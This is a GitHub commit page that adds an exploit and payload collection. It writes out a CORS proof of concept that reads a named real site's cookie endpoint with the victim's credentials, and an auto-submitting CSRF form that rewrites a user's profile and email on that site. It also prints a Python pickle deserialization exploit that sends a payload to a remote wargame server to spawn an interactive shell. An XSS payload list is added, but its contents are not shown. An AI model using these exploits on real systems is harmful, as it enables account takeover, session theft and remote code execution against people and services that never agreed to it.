Skip to content

Commit a25d5fb

Browse files
author
guifre
committed
add new lists
1 parent f2bd2c1 commit a25d5fb

10 files changed

+11457
-0
lines changed

exploits/cors-poc.html

Lines changed: 13 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,13 @@
1+
<body>
2+
<script>
3+
var req = new XMLHttpRequest();
4+
req.onload = reqListener;
5+
req.open('get','http://www.pornhub.com/user/premium_redirect_cookie',true);
6+
req.withCredentials = true;
7+
req.send();
8+
9+
function reqListener() {
10+
console.log(this.responseText);
11+
};
12+
</script>
13+
</body>

exploits/csrf-post-poc.html

Lines changed: 31 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,31 @@
1+
<body>
2+
3+
<FORM action="http://www.pornhub.com/user/edit" METHOD="POST">
4+
5+
<input type="hidden" name="month" value="3">
6+
<input type="hidden" name="day" value="3">
7+
<input type="hidden" name="year" value="1994">
8+
<input type="hidden" name="gender" value="7">
9+
<input type="hidden" name="relation_status" value="1">
10+
<input type="hidden" name="orientation" value="2">
11+
<input type="hidden" name="website" value="">
12+
<input type="hidden" name="hometown" value="">
13+
<input type="hidden" name="city" value="Wilmslow">
14+
<input type="hidden" name="country" value="GB">
15+
<input type="hidden" name="job" value="ewf">
16+
<input type="hidden" name="company" value="wef">
17+
<input type="hidden" name="school" value="ewf">
18+
<input type="hidden" name="about_me" value="wef">
19+
<input type="hidden" name="interests" value="">
20+
<input type="hidden" name="fav_movies" value="">
21+
<input type="hidden" name="fav_music" value="">
22+
<input type="hidden" name="fav_books" value="">
23+
<input type="hidden" name="turnons" value="">
24+
<input type="hidden" name="turnoffs" value="">
25+
<input type="hidden" name="check_what" value="">
26+
<input type="hidden" name="email" value="dahi%40stromox.com">
27+
<input type="hidden" name="username" value="dahi1">
28+
<input type="hidden" name="password_new" value="">
29+
<input type="hidden" name="password_confirm" value="\">
30+
</FORM>
31+
<script>document.forms[0].submit();</script>

exploits/pickle_deserialization.py

Lines changed: 22 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,22 @@
1+
import socket
2+
import cPickle as pickle
3+
import cPickle
4+
import subprocess
5+
import sys
6+
7+
class Execute(object):
8+
def __reduce__(self):
9+
return(subprocess.call, (('/bin/sh','-i'),0,None,4,4,4))
10+
11+
s = socket.socket()
12+
s.connect(('amateria.smashthestack.org', 54321))
13+
print s.recv(256)
14+
s.send(pickle.dumps(Execute()))
15+
while 1 == 1:
16+
print s.recv(512)
17+
msg = sys.stdin.readline()
18+
s.send(msg + '\r\n')
19+
s.close()
20+
21+
22+

payloads/XSS.txt

Lines changed: 2228 additions & 0 deletions
Large diffs are not rendered by default.

0 commit comments

Comments
 (0)